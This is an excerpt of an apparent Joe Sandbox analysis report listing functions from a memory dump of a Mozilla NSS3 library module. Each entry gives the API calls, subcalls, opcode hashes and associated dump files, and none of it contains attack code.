Opcode ID: ccc6c6ae14c16c4d1c05811b5e330a115516c2603f70fceb88ecafef7934221c
Instruction ID: 7facdebf8f03bf0324ee110c5d0745ce2d48cb48bc0a7e6132cb3396ff457c06
Opcode Fuzzy Hash: ccc6c6ae14c16c4d1c05811b5e330a115516c2603f70fceb88ecafef7934221c
Instruction Fuzzy Hash: 961126B2A002009BEB206F69FE09A1A7BB8BB0637CF140135ED5987B12E721E814C6D5

Function 6C7CEDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C7B7FFA,?,6C7B9767,?,8B7874C0,0000A48E), ref: 6C7CEDD4
realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C7B7FFA,?,6C7B9767,?,8B7874C0,0000A48E), ref: 6C7CEDFD
PORT_Alloc_Util.NSS3(?,00000000,00000000,6C7B7FFA,?,6C7B9767,?,8B7874C0,0000A48E), ref: 6C7CEE14

Part of subcall function 6C7A0BE0: malloc.MOZGLUE(6C798D2D,?,00000000,?), ref: 6C7A0BF8
Part of subcall function 6C7A0BE0: TlsGetValue.KERNEL32(6C798D2D,?,00000000,?), ref: 6C7A0C15

memcpy.VCRUNTIME140(?,?,6C7B9767,00000000,00000000,6C7B7FFA,?,6C7B9767,?,8B7874C0,0000A48E), ref: 6C7CEE33

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 3903481028-0
Opcode ID: 790c593629ca4b7c8e300695e48d739dfa3b6e97bce3cd9ee5ddf8869ae99884
Instruction ID: 9a26770820c973d1423c7bd7008b0ac93a0688be20ab25c60782a09b811a8769
Opcode Fuzzy Hash: 790c593629ca4b7c8e300695e48d739dfa3b6e97bce3cd9ee5ddf8869ae99884
Instruction Fuzzy Hash: 4E11A3B1B0070BAFE7109E65DE8AB06B3ACEB0439DF244535E91986A01E331E464C7E2

Function 6C7B08D0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C7B09B3,0000001A,?), ref: 6C7B08E9

Part of subcall function 6C7A0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7A08B4

SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C7B08FD

Part of subcall function 6C79FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C798D2D,?,00000000,?), ref: 6C79FB85
Part of subcall function 6C79FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C79FBB1

SECITEM_AllocItem_Util.NSS3(?,00000000,00000001), ref: 6C7B0939
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7B0953

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Util$ErrorItem_$AllocAlloc_ArenaCopyFindTag_memcpy
String ID:
API String ID: 2572351645-0
Opcode ID: 2e99b12f1c9af86e3f260138aaee893669f473c170dc6a84dddc8e352a0eca88
Instruction ID: efe22acd5ea6d144fd8167f97ac02d1d8cd06e046168f4bb5fd7a1fd00bb255c
Opcode Fuzzy Hash: 2e99b12f1c9af86e3f260138aaee893669f473c170dc6a84dddc8e352a0eca88
Instruction Fuzzy Hash: 8E01D6F560174A6BFB149F36AF14B673B98AF40258F10443AEC2AD6A41FB31E4148A94

Function 6C7949C0 Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

Part of subcall function 6C798800: TlsGetValue.KERNEL32(?,6C7A085A,00000000,?,6C748369,?), ref: 6C798821
Part of subcall function 6C798800: TlsGetValue.KERNEL32(?,?,6C7A085A,00000000,?,6C748369,?), ref: 6C79883D
Part of subcall function 6C798800: EnterCriticalSection.KERNEL32(?,?,?,6C7A085A,00000000,?,6C748369,?), ref: 6C798856
Part of subcall function 6C798800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C798887
Part of subcall function 6C798800: PR_Unlock.NSS3(?,?,?,?,6C7A085A,00000000,?,6C748369,?), ref: 6C798899

PR_SetError.NSS3 ref: 6C794A10
TlsGetValue.KERNEL32(6C78781D,?,6C77BD28,00CD52E8,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C794A24
EnterCriticalSection.KERNEL32(?,?,?,6C77BD28,00CD52E8), ref: 6C794A39
PR_Unlock.NSS3(?,?,?,?,6C77BD28,00CD52E8), ref: 6C794A4E

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$CondErrorWait
String ID:
API String ID: 3904631464-0
Opcode ID: 3dac0af3916626f645da8ff43cd16e4607e3123741c947785e25d3680550a178
Instruction ID: bd9e28e445bbd65b6a77d63344114949919a4cd9d788323f454e10b40b6cca00
Opcode Fuzzy Hash: 3dac0af3916626f645da8ff43cd16e4607e3123741c947785e25d3680550a178
Instruction Fuzzy Hash: 07216D75A056008FDB20AF79E28856ABBF4FF4535CF014979D8998BB01E734E844CBD5

Function 6C73EAD0 Relevance: 6.1, APIs: 4, Instructions: 54networkthreadCOMMON

Download Yara Rule

APIs

htons.WSOCK32(?), ref: 6C73EB13
htonl.WSOCK32(00000000,?), ref: 6C73EB26
htons.WSOCK32(?), ref: 6C73EB44
PR_GetCurrentThread.NSS3(?), ref: 6C73EB58

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: htons$CurrentThreadhtonl
String ID:
API String ID: 2156189399-0
Opcode ID: c0e296b74fc48b7ffc1c3e0ad149f7ab4ebf8a88aa8a66fdecd900e57bfcb2b7
Instruction ID: a2c7a181fd57b750fa3146a1d1a02c5ec2cfad9c322aac4607649536f45d1731
Opcode Fuzzy Hash: c0e296b74fc48b7ffc1c3e0ad149f7ab4ebf8a88aa8a66fdecd900e57bfcb2b7
Instruction Fuzzy Hash: 6511B671D647A597D3208F258A00AB673A0BF95318F01BB1EE8CE47E62E7B4A4D0C394

Function 6C768DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C768DE7
EnterCriticalSection.KERNEL32 ref: 6C768DFC
PR_Unlock.NSS3 ref: 6C768E2D
PR_SetError.NSS3 ref: 6C768E49

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: 39ab79fadb219af39034d0e45b25cba0276840560cadfbba8727e09d4361c525
Instruction ID: 4bd5eb0a6cef4f988dbbba336c27c68dc8aae27c0a14be338429ac5dcaf8258c
Opcode Fuzzy Hash: 39ab79fadb219af39034d0e45b25cba0276840560cadfbba8727e09d4361c525
Instruction Fuzzy Hash: F1118F75605A009BD740AF79D648159BBF4FF46318F01492ADC88D7B01E730E854CBD2

Function 6C7D2BE0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C7D2A28,00000060,00000001), ref: 6C7D2BF0

Part of subcall function 6C7495B0: TlsGetValue.KERNEL32(00000000,?,6C7600D2,00000000), ref: 6C7495D2
Part of subcall function 6C7495B0: EnterCriticalSection.KERNEL32(?,?,?,6C7600D2,00000000), ref: 6C7495E7
Part of subcall function 6C7495B0: PR_Unlock.NSS3(?,?,?,?,6C7600D2,00000000), ref: 6C749605

CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C7D2A28,00000060,00000001), ref: 6C7D2C07
SECKEY_DestroyPublicKey.NSS3(?,00000000,00000000,?,6C7D2A28,00000060,00000001), ref: 6C7D2C1E
free.MOZGLUE(?,00000000,00000000,?,6C7D2A28,00000060,00000001), ref: 6C7D2C4A

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Destroy$Certificate$CriticalEnterPublicSectionUnlockValuefree
String ID:
API String ID: 358400960-0
Opcode ID: f0a0f37e433c8440dfa6a69a83606b423d02236a42981112f3d630b963cf41f3
Instruction ID: c4c899a5024a0cd3b6180065efe97fcd7991e22ced7231534ce44aa1766d3b15
Opcode Fuzzy Hash: f0a0f37e433c8440dfa6a69a83606b423d02236a42981112f3d630b963cf41f3
Instruction Fuzzy Hash: 77013CB1A007415BEB20CF39EA08753B7E8AF54648F154A38E89AD3B41FB31F959C691

Function 6C7EAC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C7D5F17,?,?,?,?,?,?,?,?,6C7DAAD4), ref: 6C7EAC94
PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C7D5F17,?,?,?,?,?,?,?,?,6C7DAAD4), ref: 6C7EACA6
free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C7DAAD4), ref: 6C7EACC0
free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C7DAAD4), ref: 6C7EACDB

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: free$DestroyFreeK11_Monitor
String ID:
API String ID: 3989322779-0
Opcode ID: e58eeeb4b71b1ad38d817f1a061525ca4852d7d8dcec4a118ba4cb173a6dbd1b
Instruction ID: f881df85c9fbbf8b32918df66ff6dc893f0f34c5f711f4ee5ac66cbf90da0e42
Opcode Fuzzy Hash: e58eeeb4b71b1ad38d817f1a061525ca4852d7d8dcec4a118ba4cb173a6dbd1b
Instruction Fuzzy Hash: CB015EB2601B019BE760DF29DA09753BBF8BF04669B504839D85AC3E10E731F455CBD1

Function 6C7988E0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,?,6C7A08AA,?), ref: 6C7988F6
EnterCriticalSection.KERNEL32(?,?,?,?,6C7A08AA,?), ref: 6C79890B
PR_NotifyCondVar.NSS3(?,?,?,?,?,6C7A08AA,?), ref: 6C798936
PR_Unlock.NSS3(?,?,?,?,?,6C7A08AA,?), ref: 6C798940

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: CondCriticalEnterNotifySectionUnlockValue
String ID:
API String ID: 959714679-0
Opcode ID: d19e7f615cf7f027d153fed3badba9db1c3b5bd0a620aa3e51df4ed3a920c2ac
Instruction ID: 45259ea68b84f031757f47e389c94986dc4c0b7e90dcf3bf722e950a2a4c717a
Opcode Fuzzy Hash: d19e7f615cf7f027d153fed3badba9db1c3b5bd0a620aa3e51df4ed3a920c2ac
Instruction Fuzzy Hash: 520184756046059FDB00AF39D188659BBF4FF0539CF05063AE88987B01E734E894CBC2

Function 6C7D0840 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C8A2F88,6C7D0660,00000020,00000000,?,?,6C7D2C3D,?,00000000,00000000,?,6C7D2A28,00000060,00000001), ref: 6C7D0860

Part of subcall function 6C6C4C70: TlsGetValue.KERNEL32(?,?,?,6C6C3921,6C8A14E4,6C80CC70), ref: 6C6C4C97
Part of subcall function 6C6C4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C6C3921,6C8A14E4,6C80CC70), ref: 6C6C4CB0
Part of subcall function 6C6C4C70: PR_Unlock.NSS3(?,?,?,?,?,6C6C3921,6C8A14E4,6C80CC70), ref: 6C6C4CC9

TlsGetValue.KERNEL32(00000020,00000000,?,?,6C7D2C3D,?,00000000,00000000,?,6C7D2A28,00000060,00000001), ref: 6C7D0874
EnterCriticalSection.KERNEL32(00000001), ref: 6C7D0884
PR_Unlock.NSS3 ref: 6C7D08A3

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$CallOnce
String ID:
API String ID: 2502187247-0
Opcode ID: e4bccb4805e30692e512658b449dfcf9bf843fd1f995a19c87188b17f7a057ac
Instruction ID: a1d152a71c3d14816e99b1dacee051cc6b5506ed8838418f9efa280e75f901e6
Opcode Fuzzy Hash: e4bccb4805e30692e512658b449dfcf9bf843fd1f995a19c87188b17f7a057ac
Instruction Fuzzy Hash: 3D01FC75A002446BEB312F6AEE499597B34EB5631DF051171EC0C52602EB22A494C6D1

Function 6C85CC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?), ref: 6C85CC61
free.MOZGLUE ref: 6C85CC6E
DeleteCriticalSection.KERNEL32(?), ref: 6C85CC80
free.MOZGLUE(?), ref: 6C85CC87

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: CriticalDeleteSectionfree
String ID:
API String ID: 2988086103-0
Opcode ID: 40f046e3f80842643302f7bf41e634cfdee85ca0da82b39aa9a7ba0d820ca27d
Instruction ID: ef47705cf4e2d7e284f6749559db1f072c614c908f4de0b784e96ded0a3082e4
Opcode Fuzzy Hash: 40f046e3f80842643302f7bf41e634cfdee85ca0da82b39aa9a7ba0d820ca27d
Instruction Fuzzy Hash: F6E030B6700608ABCA10EFA9DC4488677ACEE4A2747150535E691C3701D232F905CBE1

Function 6C796E40 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 257timeCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C797122
PR_ImplodeTime.NSS3(?), ref: 6C797162

Strings

/G6/, xrefs: 6C796E4C

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: ErrorImplodeTime
String ID: /G6/
API String ID: 1407570941-570549270
Opcode ID: 93f2ba846ecbba828c201a663fbc5f5199a6cbd1bea85b1f533fa1f6be95472e
Instruction ID: 5170c3967a5b7f28e586c1ac2c1f678baf450a6a142c16bf0e1e2994b84f6955
Opcode Fuzzy Hash: 93f2ba846ecbba828c201a663fbc5f5199a6cbd1bea85b1f533fa1f6be95472e
Instruction Fuzzy Hash: CBA158306456454FD720CE28D9A27EABBF5ABC5331F48076AD5618F7F2F73881868780

Function 6C75ED30 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

PK11_HashBuf.NSS3(00000004,?,NYvl,00000000), ref: 6C75ED84

Part of subcall function 6C76DDD0: SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C76DDEC
Part of subcall function 6C76DDD0: PK11_DigestBegin.NSS3(00000000), ref: 6C76DE70
Part of subcall function 6C76DDD0: PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6C76DE83
Part of subcall function 6C76DDD0: HASH_ResultLenByOidTag.NSS3(?), ref: 6C76DE95
Part of subcall function 6C76DDD0: PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6C76DEAE
Part of subcall function 6C76DDD0: PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C76DEBB

Part of subcall function 6C7610D0: PR_EnterMonitor.NSS3 ref: 6C7610EE

Strings

/G6/, xrefs: 6C75ED3C
NYvl, xrefs: 6C75ED5E, 6C75ED7F

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: K11_$Digest$BeginContextDestroyEnterFinalFindHashMonitorResultTag_Util
String ID: /G6/$NYvl
API String ID: 56469180-3345559473
Opcode ID: a8c27dbb94f04237653816faa7fd705173d88eca7661f6fa9ccb8051cfe9070d
Instruction ID: 7cd15c36dfc9a8e09c85c315abe05a744170013d5e5fb38c6dd21d5ea7a938a3
Opcode Fuzzy Hash: a8c27dbb94f04237653816faa7fd705173d88eca7661f6fa9ccb8051cfe9070d
Instruction Fuzzy Hash: 2C51C571E10209DFEB04CF95C684ADDB7B8FF08344F944629E845ABB41EB35E964CB90

Function 6C7BAF60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

Part of subcall function 6C7BAD90: SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7BADB1
Part of subcall function 6C7BAD90: PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C7BADF4
Part of subcall function 6C7BAD90: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C7BAE08
Part of subcall function 6C7BAD90: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7BAE25
Part of subcall function 6C7BAD90: PR_CallOnce.NSS3(6C8A2AA4,6C7A12D0), ref: 6C7BAE4D
Part of subcall function 6C7BAD90: PL_FreeArenaPool.NSS3 ref: 6C7BAE63

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7BAFE1
PR_SetError.NSS3(FFFFD080,00000000), ref: 6C7BB039

Strings

/G6/, xrefs: 6C7BAF6F

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Util$AlgorithmTag_$ArenaPool$CallDecodeErrorFreeInitItem_OnceQuick
String ID: /G6/
API String ID: 2548648738-570549270
Opcode ID: c8cf7680d21e3949433d089209d6a2873def34bc2bd85fc7cf4ad340d4e3cc3d
Instruction ID: 96845dafef7db1729ff0cfea56d6de921a6c887bdd6d99aa292c09a4a15505ad
Opcode Fuzzy Hash: c8cf7680d21e3949433d089209d6a2873def34bc2bd85fc7cf4ad340d4e3cc3d
Instruction Fuzzy Hash: D131E721A051159BEB208D398FC477E7269EB8835CF244536ED74B7A80E731FD49C2D9

Function 6C752800 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000008), ref: 6C752847

Part of subcall function 6C7A0BE0: malloc.MOZGLUE(6C798D2D,?,00000000,?), ref: 6C7A0BF8
Part of subcall function 6C7A0BE0: TlsGetValue.KERNEL32(6C798D2D,?,00000000,?), ref: 6C7A0C15

free.MOZGLUE(00000000), ref: 6C7528D2

Strings

/G6/, xrefs: 6C75280C

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Alloc_UtilValuefreemalloc
String ID: /G6/
API String ID: 1932469452-570549270
Opcode ID: cee45da046c721d96e658c21bc5f91f9cc7f68bdaf04fcd42ba9c86e0a1511a7
Instruction ID: d01964467f17e85361814fe9a68ec3432b1738492d22c2a16dcd2b0478f672ba
Opcode Fuzzy Hash: cee45da046c721d96e658c21bc5f91f9cc7f68bdaf04fcd42ba9c86e0a1511a7
Instruction Fuzzy Hash: 7131AF366002099FDB24DF59EC89EAE77B8FFC9318B050438E50A8B351DB35E915CB91

